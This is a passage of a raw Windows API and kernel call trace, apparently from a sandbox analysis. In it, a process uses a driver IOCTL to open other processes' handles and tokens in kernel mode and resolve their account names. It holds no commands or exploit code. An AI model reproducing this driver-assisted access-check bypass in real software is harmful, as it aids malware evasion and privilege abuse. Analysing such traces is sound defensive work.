Process=0xffffd000ac0cf388) returned 0x0 [0290.073] PsAcquireProcessExitSynchronization () returned 0x0 [0290.073] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.073] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069add9d0, HandleInformation=0x0) returned 0x0 [0290.073] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.073] PsReleaseProcessExitSynchronization () returned 0x2 [0290.073] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff92 [0290.073] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.074] ObfDereferenceObject (Object=0xffffe00069add9d0) returned 0x7ffb [0290.074] IoCompleteRequest () returned 0x0 [0290.074] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.074] PsAcquireProcessExitSynchronization () returned 0x0 [0290.074] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.074] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069adf710, HandleInformation=0x0) returned 0x0 [0290.074] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.074] PsReleaseProcessExitSynchronization () returned 0x2 [0290.074] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff91 [0290.074] ObQueryNameString (in: Object=0xffffe00069adf710, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.074] ObfDereferenceObject (Object=0xffffe00069adf710) returned 0x7ffe [0290.074] IoCompleteRequest () returned 0x0 [0290.074] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.074] PsAcquireProcessExitSynchronization () returned 0x0 [0290.074] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.074] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b89ea0, HandleInformation=0x0) returned 0x0 [0290.074] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.074] PsReleaseProcessExitSynchronization () returned 0x2 [0290.074] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff90 [0290.074] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.074] ObfDereferenceObject (Object=0xffffe00069b89ea0) returned 0x7ffe [0290.074] IoCompleteRequest () returned 0x0 [0290.074] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.074] PsAcquireProcessExitSynchronization () returned 0x0 [0290.074] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.074] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ff3cf0, HandleInformation=0x0) returned 0x0 [0290.074] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.074] PsReleaseProcessExitSynchronization () returned 0x2 [0290.074] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8f [0290.074] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.074] ObfDereferenceObject (Object=0xffffe00069ff3cf0) returned 0x7f78 [0290.074] IoCompleteRequest () returned 0x0 [0290.075] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.075] PsAcquireProcessExitSynchronization () returned 0x0 [0290.075] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.075] ObReferenceObjectByHandle (in: Handle=0x1d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000731afdb0, HandleInformation=0x0) returned 0x0 [0290.075] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.075] PsReleaseProcessExitSynchronization () returned 0x2 [0290.075] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8e [0290.075] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.075] ObfDereferenceObject (Object=0xffffe000731afdb0) returned 0x7297 [0290.075] IoCompleteRequest () returned 0x0 [0290.075] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.075] PsAcquireProcessExitSynchronization () returned 0x0 [0290.075] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.076] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a019c40, HandleInformation=0x0) returned 0x0 [0290.076] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.076] PsReleaseProcessExitSynchronization () returned 0x2 [0290.076] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8d [0290.076] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.076] ObfDereferenceObject (Object=0xffffe0006a019c40) returned 0x7e7a [0290.076] IoCompleteRequest () returned 0x0 [0290.076] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.076] PsAcquireProcessExitSynchronization () returned 0x0 [0290.076] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.076] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0be7f0, HandleInformation=0x0) returned 0x0 [0290.076] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.076] PsReleaseProcessExitSynchronization () returned 0x2 [0290.076] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8c [0290.076] ObQueryNameString (in: Object=0xffffe0006a0be7f0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.076] ObfDereferenceObject (Object=0xffffe0006a0be7f0) returned 0x7fe5 [0290.076] IoCompleteRequest () returned 0x0 [0290.076] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.076] PsAcquireProcessExitSynchronization () returned 0x0 [0290.076] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.076] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0bec40, HandleInformation=0x0) returned 0x0 [0290.076] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.076] PsReleaseProcessExitSynchronization () returned 0x2 [0290.076] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8b [0290.076] ObQueryNameString (in: Object=0xffffe0006a0bec40, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.076] ObfDereferenceObject (Object=0xffffe0006a0bec40) returned 0x7fc1 [0290.076] IoCompleteRequest () returned 0x0 [0290.076] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.076] PsAcquireProcessExitSynchronization () returned 0x0 [0290.076] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.076] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0bea30, HandleInformation=0x0) returned 0x0 [0290.076] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.076] PsReleaseProcessExitSynchronization () returned 0x2 [0290.076] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff8a [0290.076] ObQueryNameString (in: Object=0xffffe0006a0bea30, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.076] ObfDereferenceObject (Object=0xffffe0006a0bea30) returned 0x7ff2 [0290.076] IoCompleteRequest () returned 0x0 [0290.076] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.076] PsAcquireProcessExitSynchronization () returned 0x0 [0290.076] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.076] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a02ef20, HandleInformation=0x0) returned 0x0 [0290.076] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.077] PsReleaseProcessExitSynchronization () returned 0x2 [0290.077] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff89 [0290.077] ObQueryNameString (in: Object=0xffffe0006a02ef20, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.077] ObfDereferenceObject (Object=0xffffe0006a02ef20) returned 0x7ffe [0290.077] IoCompleteRequest () returned 0x0 [0290.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0x188 [0290.077] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.077] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069e0d840, HandleInformation=0x0) returned 0x0 [0290.077] ObOpenObjectByPointer (in: Object=0xffffe00069e0d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.077] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x40044 [0290.077] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.077] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.077] IoCompleteRequest () returned 0x0 [0290.077] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.077] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.078] CloseHandle (hObject=0x18c) returned 1 [0290.078] CloseHandle (hObject=0x188) returned 1 [0290.078] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.078] PsAcquireProcessExitSynchronization () returned 0x0 [0290.078] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0290.078] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e0cf20, HandleInformation=0x0) returned 0x0 [0290.078] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.078] PsReleaseProcessExitSynchronization () returned 0x2 [0290.078] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x38042 [0290.078] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.078] ObfDereferenceObject (Object=0xffffe00069e0cf20) returned 0x7ffe [0290.078] IoCompleteRequest () returned 0x0 [0290.078] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.078] PsAcquireProcessExitSynchronization () returned 0x0 [0290.078] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0290.078] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e14470, HandleInformation=0x0) returned 0x0 [0290.078] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.078] PsReleaseProcessExitSynchronization () returned 0x2 [0290.078] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x38041 [0290.078] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.078] ObfDereferenceObject (Object=0xffffe00069e14470) returned 0x7ffb [0290.079] IoCompleteRequest () returned 0x0 [0290.079] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.079] PsAcquireProcessExitSynchronization () returned 0x0 [0290.079] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0290.079] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e23b10, HandleInformation=0x0) returned 0x0 [0290.079] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.079] PsReleaseProcessExitSynchronization () returned 0x2 [0290.079] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x38040 [0290.079] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.079] ObfDereferenceObject (Object=0xffffe00069e23b10) returned 0x7ffe [0290.079] IoCompleteRequest () returned 0x0 [0290.079] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.079] PsAcquireProcessExitSynchronization () returned 0x0 [0290.079] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0290.079] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e4cb60, HandleInformation=0x0) returned 0x0 [0290.079] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.079] PsReleaseProcessExitSynchronization () returned 0x2 [0290.079] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x3803f [0290.079] ObQueryNameString (in: Object=0xffffe00069e4cb60, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.079] ObfDereferenceObject (Object=0xffffe00069e4cb60) returned 0x7fff [0290.079] IoCompleteRequest () returned 0x0 [0290.079] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.079] PsAcquireProcessExitSynchronization () returned 0x0 [0290.079] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0290.079] ObReferenceObjectByHandle (in: Handle=0x43c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ee7880, HandleInformation=0x0) returned 0x0 [0290.079] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.079] PsReleaseProcessExitSynchronization () returned 0x2 [0290.079] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x3803e [0290.079] ObQueryNameString (in: Object=0xffffe00069ee7880, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.079] ObfDereferenceObject (Object=0xffffe00069ee7880) returned 0x7ffe [0290.079] IoCompleteRequest () returned 0x0 [0290.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d0) returned 0x188 [0290.079] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.079] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069e0f840, HandleInformation=0x0) returned 0x0 [0290.079] ObOpenObjectByPointer (in: Object=0xffffe00069e0f840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.079] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x3803d [0290.079] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.079] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.079] IoCompleteRequest () returned 0x0 [0290.080] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.080] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.081] CloseHandle (hObject=0x18c) returned 1 [0290.081] CloseHandle (hObject=0x188) returned 1 [0290.081] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.081] PsAcquireProcessExitSynchronization () returned 0x0 [0290.081] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.081] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e147b0, HandleInformation=0x0) returned 0x0 [0290.081] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.081] PsReleaseProcessExitSynchronization () returned 0x2 [0290.081] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x3003b [0290.081] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.081] ObfDereferenceObject (Object=0xffffe00069e147b0) returned 0x7ffe [0290.081] IoCompleteRequest () returned 0x0 [0290.081] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.081] PsAcquireProcessExitSynchronization () returned 0x0 [0290.081] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.081] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e18580, HandleInformation=0x0) returned 0x0 [0290.081] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.081] PsReleaseProcessExitSynchronization () returned 0x2 [0290.081] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x3003a [0290.081] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.081] ObfDereferenceObject (Object=0xffffe00069e18580) returned 0x7ffc [0290.081] IoCompleteRequest () returned 0x0 [0290.081] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.081] PsAcquireProcessExitSynchronization () returned 0x0 [0290.081] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.081] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e25d70, HandleInformation=0x0) returned 0x0 [0290.081] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.081] PsReleaseProcessExitSynchronization () returned 0x2 [0290.081] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30039 [0290.081] ObQueryNameString (in: Object=0xffffe00069e25d70, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.081] ObfDereferenceObject (Object=0xffffe00069e25d70) returned 0x800e [0290.081] IoCompleteRequest () returned 0x0 [0290.081] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.081] PsAcquireProcessExitSynchronization () returned 0x0 [0290.081] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.081] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a080090, HandleInformation=0x0) returned 0x0 [0290.082] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.082] PsReleaseProcessExitSynchronization () returned 0x2 [0290.082] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30038 [0290.082] ObQueryNameString (in: Object=0xffffe0006a080090, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.082] ObfDereferenceObject (Object=0xffffe0006a080090) returned 0x7fff [0290.082] IoCompleteRequest () returned 0x0 [0290.082] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.082] PsAcquireProcessExitSynchronization () returned 0x0 [0290.082] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.082] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, 